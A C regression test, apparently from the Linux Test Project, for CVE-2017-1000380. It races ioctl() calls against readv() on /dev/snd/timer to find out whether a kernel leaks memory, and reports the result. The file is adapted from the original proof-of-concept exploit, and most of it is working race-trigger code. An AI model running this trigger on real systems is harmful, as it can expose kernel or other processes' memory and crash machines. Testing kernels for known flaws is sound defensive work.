1 // SPDX-License-Identifier: GPL-2.0-or-later
2
3 /* Copyright (c) 2019 Michael Moese <mmoese@suse.com>
4 * Regression test for CVE-2017-1000380 based on the original PoC exploit
5 * by Alexander Potapenko <glider@google.com>
6 *
7 * Be careful! This test may crash your kernel!
8 *
9 * The test performs several ioctl() parallel with readv() on the same
10 * file descriptor to /dev/snd/timer. A buggy kernel will leak memory
11 * to the process, which may contain information from the kernel or
12 * any other process on the system.
13 *
14 * The issue was fixed with
15 * http://git.kernel.org/linus/d11662f4f798b50d8c8743f433842c3e40fe3378
16 * http://git.kernel.org/linus/ba3021b2c79b2fa9114f92790a99deb27a65b728
17 */
18
19 #include "config.h"
20 #include "tst_test.h"
21 #include "tst_fuzzy_sync.h"
22 #include "tst_safe_macros.h"
23 #include "tst_safe_pthread.h"
24
25 #include <errno.h>
26 #include <fcntl.h>
27 #include <pthread.h>
28 #include <stdio.h>
29 #include <string.h>
30 #include <sys/uio.h>
31 #include <sys/ioctl.h>
32 #include <sound/asound.h>
33
34 #define MAX_BUFSIZE 1024
35
36 static int snd_fd;
37 static struct tst_fzsync_pair fzsync_pair;
38
ioctl_thread(void * unused)39 static void *ioctl_thread(void *unused)
40 {
41 int tread_arg = 1;
42 struct snd_timer_select ts;
43 struct snd_timer_params tp;
44
45 memset(&ts, 0, sizeof(ts));
46 ts.id.dev_class = 1;
47
48 memset(&tp, 0, sizeof(tp));
49 tp.ticks = 1;
50 tp.filter = 0xf;
51
52 while (tst_fzsync_run_b(&fzsync_pair)) {
53 tst_fzsync_start_race_b(&fzsync_pair);
54 ioctl(snd_fd, SNDRV_TIMER_IOCTL_TREAD, &tread_arg);
55 ioctl(snd_fd, SNDRV_TIMER_IOCTL_SELECT, &ts);
56 ioctl(snd_fd, SNDRV_TIMER_IOCTL_PARAMS, &tp);
57 ioctl(snd_fd, SNDRV_TIMER_IOCTL_START, 0);
58 tst_fzsync_end_race_b(&fzsync_pair);
59 }
60 return unused;
61 }
62
setup(void)63 static void setup(void)
64 {
65 if(access("/dev/snd/timer", F_OK))
66 tst_brk(TCONF, "The file '/dev/snd/timer' is not exist");
67
68 tst_fzsync_pair_init(&fzsync_pair);
69 snd_fd = SAFE_OPEN("/dev/snd/timer",
70 O_RDONLY|O_CREAT|O_NOCTTY|O_SYNC|O_LARGEFILE, 0);
71 }
72
cleanup(void)73 static void cleanup(void)
74 {
75 if (snd_fd > 0)
76 SAFE_CLOSE(snd_fd);
77 }
78
run(void)79 static void run(void)
80 {
81 size_t len;
82 int size;
83 struct iovec iov;
84 pthread_t th;
85 char read_buf[MAX_BUFSIZE];
86 int i, nz;
87 pthread_attr_t thread_attr;
88
89 pthread_attr_init(&thread_attr);
90 pthread_attr_setdetachstate(&thread_attr, PTHREAD_CREATE_DETACHED);
91 SAFE_PTHREAD_CREATE(&th, &thread_attr, ioctl_thread, NULL);
92
93 iov.iov_base = read_buf;
94 iov.iov_len = sizeof(read_buf) - 1;
95
96 tst_fzsync_pair_reset(&fzsync_pair, NULL);
97 while (tst_fzsync_run_a(&fzsync_pair)) {
98 nz = 0;
99 memset(read_buf, 0, sizeof(read_buf));
100
101 tst_fzsync_start_race_a(&fzsync_pair);
102 size = readv(snd_fd, &iov, 1);
103 tst_fzsync_end_race_a(&fzsync_pair);
104
105 /* check if it could be a valid ioctl result */
106 if (size == 0)
107 continue;
108
109 /* check if the buffer is non-empty */
110 for (i = 0; i < size; i++) {
111 if (read_buf[i]) {
112 nz = 1;
113 break;
114 }
115 }
116 if (!nz)
117 continue;
118
119 len = strlen(read_buf);
120 /* the kernel's struct snd_timer_read is two unsigned integers*/
121 if (len <= 2 * sizeof(unsigned int))
122 continue;
123
124 tst_res(TFAIL, "kernel seems vulnerable");
125 return;
126 }
127
128 if (tst_taint_check() != 0)
129 tst_res(TFAIL, "kernel seems vulnerable");
130 else
131 tst_res(TPASS, "kernel seems not vulnerable");
132 }
133
134 static struct tst_test test = {
135 .test_all = run,
136 .setup = setup,
137 .cleanup = cleanup,
138 .taint_check = TST_TAINT_W | TST_TAINT_D,
139 .max_runtime = 150,
140 .tags = (const struct tst_tag[]) {
141 {"linux-git", "d11662f4f798"},
142 {"linux-git", "ba3021b2c79b"},
143 {"CVE", "2017-1000380"},
144 {}
145 }
146 };
147